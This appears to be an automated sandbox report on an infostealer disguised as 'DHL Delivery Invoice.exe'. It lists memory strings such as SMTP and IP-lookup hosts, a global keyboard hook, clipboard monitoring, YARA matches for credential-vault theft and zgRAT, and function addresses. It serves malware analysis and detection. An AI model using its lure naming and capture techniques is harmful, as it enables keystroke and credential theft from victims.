0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4280859164.000000000924C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289443671.000000000957D000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288331730.00000000094D5000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003285000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278117301.0000000006AD4000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288977120.0000000009559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globa
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288788386.000000000951C000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4277374146.0000000006A87000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003285000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278117301.0000000006AD4000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsh
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288279299.00000000094D0000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4278242421.0000000006AE2000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.000000000290C000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003223000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000035AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsd
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/activity/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/album/
                      Source: LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/channel/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/group/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vimeo.com/api/v2/video/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4254539671.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4254547194.0000000000433000.00000040.00000400.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repositor
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002914000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4280859164.000000000924C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4278167799.000000000633A000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4281289694.0000000009274000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006302000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289443671.000000000957D000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\DHL Delivery Invoice.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 14.2.LIWBHGsz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: DHL Delivery Invoice.exe
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA26900_2_02AA2690
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA97E00_2_02AA97E0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA14080_2_02AA1408
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA35400_2_02AA3540
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA1C980_2_02AA1C98
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA21480_2_02AA2148
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AACA980_2_02AACA98
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA08700_2_02AA0870
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA4FE00_2_02AA4FE0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA4FF00_2_02AA4FF0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA132F0_2_02AA132F
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA13630_2_02AA1363
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA56E80_2_02AA56E8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA56F80_2_02AA56F8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA34500_2_02AA3450
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA5AE80_2_02AA5AE8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA5AF80_2_02AA5AF8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA58A00_2_02AA58A0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_02AA58B00_2_02AA58B0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097157DC0_2_097157DC
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097157D50_2_097157D5
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097176280_2_09717628
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097E2E580_2_097E2E58
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097E92E80_2_097E92E8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097ED8E00_2_097ED8E0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097E2B700_2_097E2B70
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097E2B600_2_097E2B60
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097EDD380_2_097EDD38
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097E2E4C0_2_097E2E4C
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_097EE1700_2_097EE170
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_09835AB00_2_09835AB0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_09833ADC0_2_09833ADC
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_098300400_2_09830040
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 0_2_098305500_2_09830550
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E841C89_2_00E841C8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E8E2999_2_00E8E299
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E8A9689_2_00E8A968
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E84A989_2_00E84A98
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E8DCC09_2_00E8DCC0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_00E83E809_2_00E83E80
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065366489_2_06536648
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065356289_2_06535628
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_0653B2829_2_0653B282
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065330E09_2_065330E0
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_06537DD89_2_06537DD8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_0653C1E89_2_0653C1E8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065376F89_2_065376F8
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065300409_2_06530040
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_0653E4009_2_0653E400
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065324089_2_06532408
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_06535D3B9_2_06535D3B
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_066218CA9_2_066218CA
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_066219029_2_06621902
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_066219089_2_06621908
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeCode function: 9_2_065300069_2_06530006
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E62CA010_2_02E62CA0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E64CB810_2_02E64CB8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E6004010_2_02E60040
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E6000610_2_02E60006
